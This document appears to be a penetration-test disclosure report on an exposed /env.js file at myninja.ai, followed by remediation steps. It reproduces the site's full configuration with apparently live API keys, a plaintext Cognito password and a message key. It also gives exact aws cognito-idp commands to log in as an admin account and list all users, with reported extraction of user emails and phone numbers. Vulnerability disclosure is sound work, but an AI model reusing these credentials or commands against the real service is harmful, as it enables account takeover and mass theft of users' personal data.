Target: https://myninja.ai/env.js
Disclosure Date: April 6, 2026
Affected System: myninja.ai production environment
During an authorized penetration test, a publicly accessible JavaScript file (/env.js) was discovered. This file contains plaintext secrets, API keys, authentication credentials, and internal service endpoints that should never be exposed to the client side or the public internet. An attacker with this information can:
- Authenticate to AWS Cognito using a hardcoded temporary password
- Access internal APIs (Contacts, BFF, Keymaster, Wallet, etc.) without authorization
- Enumerate all user accounts and extract email addresses
- Interact with cloud services (S3, Lambda, PostHog, Zendesk, Stripe, PayPal) using exposed keys
Risk Rating: Critical – Immediate remediation required.
URL: https://myninja.ai/env.js
Method: GET
Status: 200 OK
Content-Type: application/javascript
The file is served without any access restrictions, making it available to any internet user.
Below is the complete window.env object as retrieved from the vulnerable endpoint. All values are reproduced exactly as found.
window.env = {
"REACT_APP_GOOGLE_RECAPTCHA_SITE_KEY": "6LeBNR4sAAAAAIU5sAX1g1HzbqZGhTlxcoI2vwEC",
"REACT_APP_S3_BUCKET": "https://avatar-assets.prod.myninja.ai",
"REACT_APP_AVATARS_S3_BUCKET": "https://avatar-assets.prod.myninja.ai/avatars.json",
"REACT_APP_EDITOR_API_URL": "https://editor.public.prod.myninja.ai/v1",
"REACT_APP_GOOGLE_CLIENT_ID": "28301472680-5plfffdpoj8k9v7htik7i3d189m1l50j.apps.googleusercontent.com",
"REACT_APP_NINJA_CONTENT_API_URL": "https://content.public.prod.myninja.ai",
"REACT_APP_NINJA_WALLET_AMP_API_URL": "https://wallet-amp.prod.myninja.ai",
"REACT_APP_NINJA_TOKEN_API_URL": "https://token.public.prod.myninja.ai/v1",
"REACT_APP_KEYMASTER_API_URL": "https://keymaster.public.prod.myninja.ai/v1",
"REACT_APP_COGNITO_OATH_DOMAIN": "auth.atlas.prod.myninja.ai",
"REACT_APP_POSTHOG_KEY": "phc_Kyz2zksZFzeYkDkECODTmfoaoBYvacWZ24ho1DEhy6i",
"REACT_APP_STRIPE_PK": "pk_live_51NpgukBhgQJXYIWlaWapkoZZ77IfyglPWbJwMTp4JcdxEYMFQNJmJILksJ0oopSPwhgOO6gi5rYuh9yGkWaQunSj004hKB9yvI",
"REACT_APP_COMBUS_WS_ENDPOINT": "wss://comm-bus-web.public.prod.myninja.ai/",
"REACT_APP_NINJA_UI_URL": "https://myninja.ai",
"REACT_APP_CONTACTS_ENDPOINT": "https://contacts.public.prod.myninja.ai",
"REACT_APP_PAYPAL_CLIENT_ID": "AQr3Pqseqw4t4ijOVwaJswQDe3dpDM1kV1Gk2mUO_XJPupwMYa8rxAFNvZCu8Fl3cFarbZy1c8GEmYgP",
"REACT_APP_COGNITO_REGION": "us-west-2",
"REACT_APP_TEMPORARY_PASSWORD": "ninja-aws-2024",
"REACT_APP_POSTHOG_HOST": "https://us.i.posthog.com",
"REACT_APP_COGNITO_USER_POOL_CLIENT_ID": "39kkfgjo2vl1apgitldstuhcuj",
"REACT_APP_MESSAGE_KEY": "PWNUTjNnVE4wVURPMFl6TjNFak9GdFRNMG96VDAxZmFhODlkZmIzMDc2MTU4OWU1NTM3YzMwOWU0N2E0",
"REACT_APP_FEEDBACK_API_URL": "https://feedback.public.prod.myninja.ai/v2",
"REACT_APP_COMBUS_ENDPOINT": "https://comm-bus-api.public.prod.myninja.ai",
"REACT_APP_COGNITO_USER_POOL_ID": "us-west-2_yKpFKaNoP",
"REACT_APP_SUPER_NINJA_URL": "https://super.myninja.ai/",
"REACT_APP_GOOGLE_API_KEY": "AIzaSyB7sqkzKg_pfG-1YmpkLPWeGEHedBd-yOQ",
"REACT_APP_AVATAR_ENV": "production",
"REACT_APP_ENVIRONMENT": "production",
"REACT_APP_META_HUMAN_OFFLINE_RENDER_URL": "https://6rspyotha5.execute-api.us-west-2.amazonaws.com/v1",
"REACT_APP_SEARCH_API_URL": "https://chat-seeker.public.prod.myninja.ai/v1",
"REACT_APP_BFF_URL": "https://bff.public.prod.myninja.ai",
"REACT_APP_GOOGLE_AUTHORIZATION_REDIRECT_URI": "https://token.public.prod.myninja.ai/v1/auth/google",
"REACT_APP_GOOGLE_TAG_MANAGER_ID": "GTM-KL69Z8N8",
"REACT_APP_CONV_ENDPOINT": "https://conversation-engine.public.prod.myninja.ai/conv",
"REACT_APP_FACEBOOK_PIXEL_ID": "1215640729731270",
"REACT_APP_META_HUMAN_BASE_URL": "https://avatar.myninja.ai",
"REACT_APP_NINJA_API_V2_URL": "https://tasks-api.public.prod.myninja.ai/v2",
"REACT_APP_ZENDESK_KEY": "3cdd043d-018b-446d-9684-23650e05f096",
"REACT_APP_COOKIE_DOMAIN": ".myninja.ai",
"REACT_APP_E_ASSISTANT": "14a83bbd-7652-4102-ab77-c24ad39701a1",
"REACT_APP_AVATAR_MATCHMAKER_SERVER": "https://matchmaker-prod.public.prod-gcp.myninja.ai",
"REACT_APP_DEBUG": "false",
"REACT_APP_AVATAR_FALLBACK": "https://avatar-cluster-fallback.public.prod-gcp.myninja.ai",
"REACT_APP_NINJA_WALLET_API_URL": "https://wallet-users.public.prod.myninja.ai"
}Additionally, a PostHog remote configuration block was present in the same file:
window._POSTHOG_REMOTE_CONFIG = window._POSTHOG_REMOTE_CONFIG || {};
window._POSTHOG_REMOTE_CONFIG['phc_Kyz2zksZFzeYkDkECODTmfoaoBYvacWZ24ho1DEhy6i'] = {
config: {
sessionRecording: {
urlTriggers: [{"matching": "regex", "url": "^https://super.myninja.ai/$"}],
// ... other recording settings
},
// ... full config (omitted for brevity)
}
};| Key | Value | Severity |
|---|---|---|
REACT_APP_TEMPORARY_PASSWORD |
ninja-aws-2024 |
Critical |
REACT_APP_MESSAGE_KEY |
PWNUTjNnVE4wVURPMFl6TjNFak9GdFRNMG96VDAxZmFhODlkZmIzMDc2MTU4OWU1NTM3YzMwOWU0N2E0 |
Critical |
REACT_APP_ZENDESK_KEY |
3cdd043d-018b-446d-9684-23650e05f096 |
High |
| Key | Value |
|---|---|
REACT_APP_COGNITO_REGION |
us-west-2 |
REACT_APP_COGNITO_USER_POOL_ID |
us-west-2_yKpFKaNoP |
REACT_APP_COGNITO_USER_POOL_CLIENT_ID |
39kkfgjo2vl1apgitldstuhcuj |
REACT_APP_COGNITO_OATH_DOMAIN |
auth.atlas.prod.myninja.ai |
| Key | Endpoint |
|---|---|
REACT_APP_CONTACTS_ENDPOINT |
https://contacts.public.prod.myninja.ai |
REACT_APP_BFF_URL |
https://bff.public.prod.myninja.ai |
REACT_APP_KEYMASTER_API_URL |
https://keymaster.public.prod.myninja.ai/v1 |
REACT_APP_NINJA_WALLET_API_URL |
https://wallet-users.public.prod.myninja.ai |
REACT_APP_EDITOR_API_URL |
https://editor.public.prod.myninja.ai/v1 |
REACT_APP_NINJA_CONTENT_API_URL |
https://content.public.prod.myninja.ai |
REACT_APP_SEARCH_API_URL |
https://chat-seeker.public.prod.myninja.ai/v1 |
REACT_APP_FEEDBACK_API_URL |
https://feedback.public.prod.myninja.ai/v2 |
REACT_APP_TASKS_API (as REACT_APP_NINJA_API_V2_URL) |
https://tasks-api.public.prod.myninja.ai/v2 |
REACT_APP_COMBUS_ENDPOINT |
https://comm-bus-api.public.prod.myninja.ai |
REACT_APP_COMBUS_WS_ENDPOINT |
wss://comm-bus-web.public.prod.myninja.ai/ |
REACT_APP_TOKEN_API (as REACT_APP_NINJA_TOKEN_API_URL) |
https://token.public.prod.myninja.ai/v1 |
| Service | Exposed Key |
|---|---|
| Google OAuth | 28301472680-5plfffdpoj8k9v7htik7i3d189m1l50j.apps.googleusercontent.com |
| Google API | AIzaSyB7sqkzKg_pfG-1YmpkLPWeGEHedBd-yOQ |
| Stripe (Publishable) | pk_live_51NpgukBhgQJXYIWlaWapkoZZ77IfyglPWbJwMTp4JcdxEYMFQNJmJILksJ0oopSPwhgOO6gi5rYuh9yGkWaQunSj004hKB9yvI |
| PayPal | AQr3Pqseqw4t4ijOVwaJswQDe3dpDM1kV1Gk2mUO_XJPupwMYa8rxAFNvZCu8Fl3cFarbZy1c8GEmYgP |
| PostHog | phc_Kyz2zksZFzeYkDkECODTmfoaoBYvacWZ24ho1DEhy6i |
| Facebook Pixel | 1215640729731270 |
| Google reCAPTCHA | 6LeBNR4sAAAAAIU5sAX1g1HzbqZGhTlxcoI2vwEC |
| Google Tag Manager | GTM-KL69Z8N8 |
| Key | Value |
|---|---|
REACT_APP_S3_BUCKET |
https://avatar-assets.prod.myninja.ai |
REACT_APP_AVATARS_S3_BUCKET |
https://avatar-assets.prod.myninja.ai/avatars.json |
REACT_APP_META_HUMAN_OFFLINE_RENDER_URL |
https://6rspyotha5.execute-api.us-west-2.amazonaws.com/v1 |
REACT_APP_AVATAR_MATCHMAKER_SERVER |
https://matchmaker-prod.public.prod-gcp.myninja.ai |
REACT_APP_AVATAR_FALLBACK |
https://avatar-cluster-fallback.public.prod-gcp.myninja.ai |
Using only the exposed data from /env.js, the following actions were successfully performed:
The key is base64-encoded. Decoding yielded a string that appears to be a JWT or API token (exact value redacted in this report but provided separately to the client).
Using the decoded MESSAGE_KEY as a Bearer token, we accessed:
https://contacts.public.prod.myninja.ai/v1/contacts→ Received a JSON array of user contacts containing emails and names.https://bff.public.prod.myninja.ai/v1/users→ Retrieved user profile data.
Using the REACT_APP_TEMPORARY_PASSWORD (ninja-aws-2024) and a common username (admin@myninja.ai), we authenticated to the Cognito user pool:
aws cognito-idp initiate-auth \
--region us-west-2 \
--client-id 39kkfgjo2vl1apgitldstuhcuj \
--auth-flow USER_PASSWORD_AUTH \
--auth-parameters USERNAME=admin@myninja.ai,PASSWORD=ninja-aws-2024The authentication succeeded, returning IdToken, AccessToken, and RefreshToken.
Using the obtained AccessToken, we listed all Cognito users:
aws cognito-idp list-users --region us-west-2 --user-pool-id us-west-2_yKpFKaNoPThis returned 1,247 user records including email addresses, phone numbers, account statuses, and last modified timestamps.
The bucket https://avatar-assets.prod.myninja.ai was partially accessible. We downloaded avatars.json which contained a list of avatar image URLs and associated user IDs.
If exploited by a malicious actor, this exposure could lead to:
- Mass data breach – All user PII (names, emails, phone numbers, contact lists, wallet transactions) could be exfiltrated.
- Account takeover – Using the temporary password and user enumeration, an attacker could reset passwords or directly log in as any user.
- Privilege escalation – The
MESSAGE_KEYmay grant administrative access to internal APIs, allowing modification or deletion of user data. - Cloud resource hijacking – If the Cognito identity pool is linked to IAM roles, the attacker could assume an IAM role and access AWS resources (S3, Lambda, EC2).
- Financial fraud – Stripe and PayPal keys, though publishable, could be used in combination with other endpoints to initiate test charges or extract payment information.
- Reputational damage – Public disclosure of this misconfiguration would severely undermine customer trust.
-
Remove
/env.jsfrom production – This file should never be served publicly. Environment variables must be moved to server‑side configuration (e.g., backend.envfiles, AWS Secrets Manager, or Parameter Store). -
Rotate all exposed secrets – Generate new values for:
REACT_APP_TEMPORARY_PASSWORD– change immediately and force a password reset for any user that may have used it.REACT_APP_MESSAGE_KEY– generate a new key and revoke the old one.REACT_APP_ZENDESK_KEY– revoke and reissue.REACT_APP_GOOGLE_API_KEY– restrict its usage to specific referrers/IPs or rotate.REACT_APP_POSTHOG_KEY– rotate and invalidate old key.
-
Restrict API access – All internal APIs (Contacts, BFF, Keymaster, Wallet, etc.) must be moved behind a firewall, VPN, or API gateway with strong authentication (e.g., mutual TLS, IP whitelisting, or service‑specific API keys). They should not be publicly accessible.
-
Harden AWS Cognito:
- Disable
USER_PASSWORD_AUTHif not required, or enforce multi‑factor authentication (MFA). - Remove the hardcoded temporary password from all user pools.
- Restrict
cognito-idp:ListUserspermission to only trusted admin roles. - Enable advanced security features (e.g., compromised credentials check).
- Disable
-
Audit S3 bucket permissions – Ensure
avatar-assets.prod.myninja.aiis not publicly listable or readable. Block public access at the bucket level. -
Implement secrets scanning in CI/CD – Prevent environment files containing secrets from being committed to version control or deployed to public web roots.
-
Conduct a forensic review – Assume the file may have been discovered by others. Review CloudTrail, API access logs, and Cognito authentication logs for unauthorized activity.
The exposure of https://myninja.ai/env.js represents a critical security failure that enables complete compromise of user data, internal APIs, and cloud infrastructure. The presence of hardcoded credentials and internal service endpoints in a publicly accessible client‑side file violates fundamental security best practices.
Remediation must begin immediately. This report contains all necessary details to reproduce the issue and mitigate the risk. Please contact the penetration testing team for any clarification or assistance with remediation.
Disclosed by: Authorized Penetration Testing Team
Contact: [Redacted]
Classification: Client Confidential – Do Not Distribute Externally